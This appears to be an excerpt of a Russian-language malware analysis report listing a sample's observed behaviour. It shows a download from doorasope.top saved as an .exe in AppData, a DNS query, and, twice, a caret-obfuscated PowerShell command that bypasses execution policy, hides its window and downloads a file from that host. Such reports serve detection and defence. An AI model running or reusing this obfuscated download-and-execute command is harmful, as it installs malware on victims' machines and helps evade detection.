Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoweR^Sh^e^l^l.eX^E -^EX^e^Cu^tiOnP^OlI^cy^ ByPaSs -N^o^P^Ro^fILE -WINdOWsTyl^e HID^den (^n^ew-Ob^J^ec^T^ ^s^ySTem.^NEt^.WE^bCLI^eNT).^do^W^n^l^OA^d^FILe(^'http://www.doorasope.top/...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "PoweR^Sh^e^l^l.eX^E -^EX^e^Cu^tiOnP^OlI^cy^ ByPaSs -N^o^P^Ro^fILE -WINdOWsTyl^e HID^den (^n^ew-Ob^J^ec^T^ ^s^ySTem.^NEt^.WE^bCLI^eNT).^do^W^n^l^OA^d^FILe(^'http://www.doorasope.top/...' (со скрытым окном)